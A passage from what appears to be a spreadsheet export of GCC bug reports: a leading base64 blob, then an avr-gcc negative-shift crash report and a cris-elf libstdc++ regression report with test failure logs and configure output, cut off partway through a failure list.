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
9WRCuv+/Pzo1ivBKhk+THsGevI</t>
  </si>
  <si>
    <t>GCC-19293</t>
  </si>
  <si>
    <t>avr-gcc crashes when using shifts with negative shift count</t>
  </si>
  <si>
    <t>avr-gcc crashes with an internal compiler error when shift operations with 
negative shift count are used e.g. a &gt;&gt; -13. Error message is negative 
instruction length probably since the expression used for calculating the 
instruction length (c-code) assumes the shift count to be a positive number. 
Test cases known to fail are e.g. . 
gcc.c-torture/compile/20020710-1 
                      20021119-1 
                      20021123-4 
                      920626-1 
                      930621-1 
Problem is present in 4.0 and I expect it to exist in all the previous 
releases. (compare the test report in gcc-testreports@gcc.gnu.org. 
BjÃ¶rn.</t>
  </si>
  <si>
    <t>bjoern.m.haase</t>
  </si>
  <si>
    <t>GCC-39644</t>
  </si>
  <si>
    <t>[4.5 Regression]: cris-elf 17_intro/headers/c++200x/all.cc plus 3</t>
  </si>
  <si>
    <t>The regressed tests are
libstdc++.sum 17_intro/headers/c++200x/all.cc
libstdc++.sum 17_intro/headers/c++200x/all_multiple_inclusion.cc
libstdc++.sum 17_intro/using_namespace_std_tr1_neg.cc
libstdc++.sum 26_numerics/headers/random/types_std_c++0x.cc
With revision 145482 these tests passed.
From revision 145488 and on these tests have failed as follows:
Running /tmp/hpautotest-gcc1/gcc/libstdc++-v3/testsuite/libstdc++-dg/conformance.exp ...
FAIL: 17_intro/headers/c++200x/all.cc (test for excess errors)
FAIL: 17_intro/headers/c++200x/all_multiple_inclusion.cc (test for excess errors)
FAIL: 17_intro/using_namespace_std_tr1_neg.cc (test for excess errors)
FAIL: 22_locale/ctype/scan/wchar_t/1.cc execution test
XPASS: 26_numerics/headers/cmath/c99_classification_macros_c.cc (test for excess errors)
FAIL: 26_numerics/headers/random/types_std_c++0x.cc (test for excess errors)
FAIL: 26_numerics/random/bernoulli_distribution/cons/default.cc (test for excess errors)
WARNING: 26_numerics/random/bernoulli_distribution/cons/default.cc compilation failed to produce executable
FAIL: 26_numerics/random/bernoulli_distribution/cons/parms.cc (test for excess errors)
WARNING: 26_numerics/random/bernoulli_distribution/cons/parms.cc compilation failed to produce executable
FAIL: 26_numerics/random/bernoulli_distribution/operators/serialize.cc (test for excess errors)
WARNING: 26_numerics/random/bernoulli_distribution/operators/serialize.cc compilation failed to produce executable
Tests shown in context with old and new FAILs.  See last for a list of new FAILs with this revision.
The message in the logfile is for the first regression:
In file included from /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/random:58
                 from /tmp/hpautotest-gcc1/gcc/libstdc++-v3/testsuite/17_intro/headers/c++200x/all.cc:122:
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc: In member function 'void std::linear_congruential_engine::seed(std::seed_seq&amp;)':
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc:121: error: expected unqualified-id before '(' token
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc: In member function 'result_type std::independent_bits_engine::operator()()':
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc:581: error: 'log2l' is not a member of 'std'
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc: In member function 'result_type std::piecewise_linear_distribution::operator()(_UniformRandomNumberGenerator&amp; const std::piecewise_linear_distribution::param_type&amp;)':
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc:2596: error: expected '' or '' before ')' token
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc: In function '_RealType std::generate_canonical(_UniformRandomNumberGenerator&amp;)':
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.tcc:2765: error: 'log2l' is not a member of 'std'
compiler exited with status 1
Most other errors are similar except for 17_intro/using_namespace_std_tr1_neg.cc and 26_numerics/headers/random/types_std_c++0x.cc:
In file included from /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/random:55
                 from /tmp/hpautotest-gcc1/gcc/libstdc++-v3/testsuite/17_intro/using_namespace_std_tr1_neg.cc:45:
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1371: error: 'uint_fast32_t' was not declared in this scope
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1371: error: template argument 1 is invalid
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1371: error: '' is not a valid type for a template constant parameter
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1371: error: '' is not a valid type for a template constant parameter
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1371: error: '' is not a valid type for a template constant parameter
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1372: error: invalid type in declaration before '' token
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1377: error: 'uint_fast32_t' was not declared in this scope
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1377: error: template argument 1 is invalid
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1377: error: '' is not a valid type for a template constant parameter
/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/bits/random.h:1377: error: '' is not a valid type for a template constant parameter
(truncated)
PASS: 17_intro/using_namespace_std_tr1_neg.cc  (test for errors line 64)
PASS: 17_intro/using_namespace_std_tr1_neg.cc  (test for errors line 64)
FAIL: 17_intro/using_namespace_std_tr1_neg.cc (test for excess errors)
Author and committer of patches in suspect revision range CC:ed.
I see there's no log2l in newlib. Perhaps worthwhile to mention that the configure test for C99 math.h succeeded:
...
checking dynamic linker characteristics... no
checking how to hardcode library paths into programs... immediate
checking for exception model to use... call frame
checking for compiler with PCH support... yes
checking for enabled PCH... yes
checking for thread model used by GCC... single
checking for atomic builtins for bool... no
checking for atomic builtins for short... no
checking for atomic builtins for int... no
checking for atomic builtins for long long... no
checking for g++ that supports -ffunction-sections -fdata-sections... yes
checking for underlying I/O to use... stdio
checking for C locale to use... generic
checking for std::allocator base class... new
configure: C header strategy set to c_global
checking for enabled long long specializations... yes
checking wchar.h usability... yes
checking wchar.h presence... yes
checking for wchar.h... yes
checking for mbstate_t... yes
checking wctype.h usability... yes
checking wctype.h presence... yes
checking for wctype.h... yes
checking for enabled wchar_t specializations... yes
checking for sin in -lm... yes
checking for ISO C99 support in ... yes
checking tgmath.h usability... yes
checking tgmath.h presence... yes
checking for tgmath.h... yes
checking complex.h usability... no
checking complex.h presence... no
checking for complex.h... no
no
checking for ISO C99 support in ... no
checking for ISO C99 support in ... no
checking for ISO C99 support in ... no
checking for fully enabled ISO C99 support... no
configure: Debug build flags set to -g3 -O0
checking for additional debug build... no
...
New FAILs with this revision:
+libstdc++.sum 26_numerics/random/bernoulli_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/bernoulli_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/bernoulli_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/bernoulli_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/binomial_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/binomial_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/binomial_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/binomial_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/cauchy_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/cauchy_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/cauchy_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/cauchy_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/chi_squared_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/chi_squared_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/chi_squared_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/chi_squared_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/default_random_engine.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/cons/base_copy.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/cons/base_move.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/cons/default.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/cons/seed1.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/cons/seed2.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/cons/seed_seq.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/operators/equal.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/operators/serialize.cc
+libstdc++.sum 26_numerics/random/discard_block_engine/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/discrete_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/discrete_distribution/cons/initlist.cc
+libstdc++.sum 26_numerics/random/discrete_distribution/cons/num_xbound_fun.cc
+libstdc++.sum 26_numerics/random/discrete_distribution/cons/range.cc
+libstdc++.sum 26_numerics/random/discrete_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/discrete_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/exponential_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/exponential_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/exponential_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/exponential_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/extreme_value_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/extreme_value_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/extreme_value_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/extreme_value_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/fisher_f_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/fisher_f_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/fisher_f_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/fisher_f_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/gamma_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/gamma_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/gamma_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/gamma_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/geometric_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/geometric_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/geometric_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/geometric_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/cons/base_copy.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/cons/base_move.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/cons/default.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/cons/seed1.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/cons/seed2.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/cons/seed_seq.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/operators/equal.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/operators/serialize.cc
+libstdc++.sum 26_numerics/random/independent_bits_engine/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/knuth_b.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/cons/default.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/cons/seed1.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/cons/seed2.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/operators/equal.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/operators/serialize.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/requirements/non_uint_neg.cc
+libstdc++.sum 26_numerics/random/linear_congruential_engine/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/lognormal_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/lognormal_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/lognormal_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/lognormal_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/mersenne_twister_engine/cons/default.cc
+libstdc++.sum 26_numerics/random/mersenne_twister_engine/cons/seed1.cc
+libstdc++.sum 26_numerics/random/mersenne_twister_engine/cons/seed2.cc
+libstdc++.sum 26_numerics/random/mersenne_twister_engine/operators/equal.cc
+libstdc++.sum 26_numerics/random/mersenne_twister_engine/operators/serialize.cc
+libstdc++.sum 26_numerics/random/mersenne_twister_engine/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/minstd_rand.cc
+libstdc++.sum 26_numerics/random/minstd_rand0.cc
+libstdc++.sum 26_numerics/random/mt19937.cc
+libstdc++.sum 26_numerics/random/mt19937_64.cc
+libstdc++.sum 26_numerics/random/negative_binomial_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/negative_binomial_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/negative_binomial_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/negative_binomial_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/normal_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/normal_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/normal_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/normal_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/piecewise_constant_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/piecewise_constant_distribution/cons/initlist_fun.cc
+libstdc++.sum 26_numerics/random/piecewise_constant_distribution/cons/num_xbound_fun.cc
+libstdc++.sum 26_numerics/random/piecewise_constant_distribution/cons/range.cc
+libstdc++.sum 26_numerics/random/piecewise_constant_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/piecewise_constant_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/piecewise_linear_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/piecewise_linear_distribution/cons/initlist_fun.cc
+libstdc++.sum 26_numerics/random/piecewise_linear_distribution/cons/num_xbound_fun.cc
+libstdc++.sum 26_numerics/random/piecewise_linear_distribution/cons/range.cc
+libstdc++.sum 26_numerics/random/piecewise_linear_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/piecewise_linear_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/poisson_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/poisson_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/poisson_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/poisson_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/random_device/cons/default.cc
+libstdc++.sum 26_numerics/random/random_device/cons/token.cc
+libstdc++.sum 26_numerics/random/random_device/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/ranlux24.cc
+libstdc++.sum 26_numerics/random/ranlux24_base.cc
+libstdc++.sum 26_numerics/random/ranlux48.cc
+libstdc++.sum 26_numerics/random/ranlux48_base.cc
+libstdc++.sum 26_numerics/random/seed_seq/cons/default.cc
+libstdc++.sum 26_numerics/random/seed_seq/cons/initlist.cc
+libstdc++.sum 26_numerics/random/seed_seq/cons/range.cc
+libstdc++.sum 26_numerics/random/seed_seq/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/cons/base_copy.cc
